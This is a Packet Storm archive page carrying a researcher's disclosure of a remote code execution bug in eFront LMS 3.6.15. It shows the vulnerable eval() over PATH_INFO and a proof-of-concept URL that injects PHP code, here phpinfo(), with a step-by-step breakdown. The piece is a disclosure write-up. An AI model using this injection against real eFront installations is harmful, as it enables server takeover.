exploit the possibilities

eFront 3.6.15 Code Execution

eFront 3.6.15 Code Execution
Posted Nov 5, 2016
Authored by Paulos Yibelo

eFront version 3.6.15 suffers from a code execution vulnerability.

tags | exploit, code execution
MD5 | 4609e1f6d7bf83a1c09fd995c41a1699

eFront 3.6.15 Code Execution

Change Mirror Download
TL,DR; A friend reminded me a couple of days ago to publish something, since its been a while last I published a post. so this is going to be a short post about an interesting-ish RCE found in all versions of eFront LMS - unfortunately, since the report have passed 90 days since initial report, I am publishing it. I will update this post if a patch for the bug is out.

The reason I have been away from the internet is because of the internet blockage in Ethiopia caused by the State of Emergency & its consequences facing you if you don't follow it, I am currently in a neighboring country so I am not technically disrespecting any laws.

In /efront/libraries/globals.php:

The following handleSEO() function is the one causing the code execution. it looks like the following:

function handleSEO() {
if (!$GLOBALS['configuration']['seo'] && $_SERVER['PATH_INFO']) {
$parts = explode("/", trim($_SERVER['PATH_INFO'], "/"));
for ($i = 0; $i < sizeof($parts); $i+=2) {
eval('$'.$parts[$i].' = "'.$parts[$i+1].'";');
}
//unset($parts);unset($i);
foreach (get_defined_vars() as $key => $value) {
$_GET[$key] = $value;
}
}
}

Because of their assumption that $_SERVER['PATH_INFO'] isn't user controllable, they sent it stright to eval(), causing the code execution.

Final PoC: https://localhost/efonrt/libraries/globals.php/hack/x%22%3Beval(phpinfo())%3B%24t%3D%22pwnd
Decoded:
https://localhost/efonrt/libraries/globals.php/hack/x";eval(phpinfo());$t="pwnd
visiting the above link will get phpinfo() executed.

Breaking it down:
$parts = explode("/", trim($_SERVER['PATH_INFO'], "/"));
for ($i = 0; $i < sizeof($parts); $i+=2) {
eval('$'.$parts[$i].' = "'.$parts[$i+1].'";');
}

Because of that specific code, we send in /globals.php/hack/x, which will become:
$hack="x

But because php already executed the code, doing a comment (/*..*/) wont work and will crash it, so we will just tamper the variables like x";eval(phpinfo());$t="pwnd

This will endup creating:

$hack = "x";eval(phpinfo());$t="pwnd";

This is then interpreted as:

eval($hack = "x";eval(phpinfo());$t="pwnd";);

And Boom! We got our code executed!

Hope you enjoyed the read!

Login or Register to add favorites

File Archive:

June 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    35 Files
  • 2
    Jun 2nd
    14 Files
  • 3
    Jun 3rd
    40 Files
  • 4
    Jun 4th
    22 Files
  • 5
    Jun 5th
    1 Files
  • 6
    Jun 6th
    1 Files
  • 7
    Jun 7th
    19 Files
  • 8
    Jun 8th
    14 Files
  • 9
    Jun 9th
    39 Files
  • 10
    Jun 10th
    20 Files
  • 11
    Jun 11th
    22 Files
  • 12
    Jun 12th
    2 Files
  • 13
    Jun 13th
    1 Files
  • 14
    Jun 14th
    32 Files
  • 15
    Jun 15th
    34 Files
  • 16
    Jun 16th
    9 Files
  • 17
    Jun 17th
    33 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close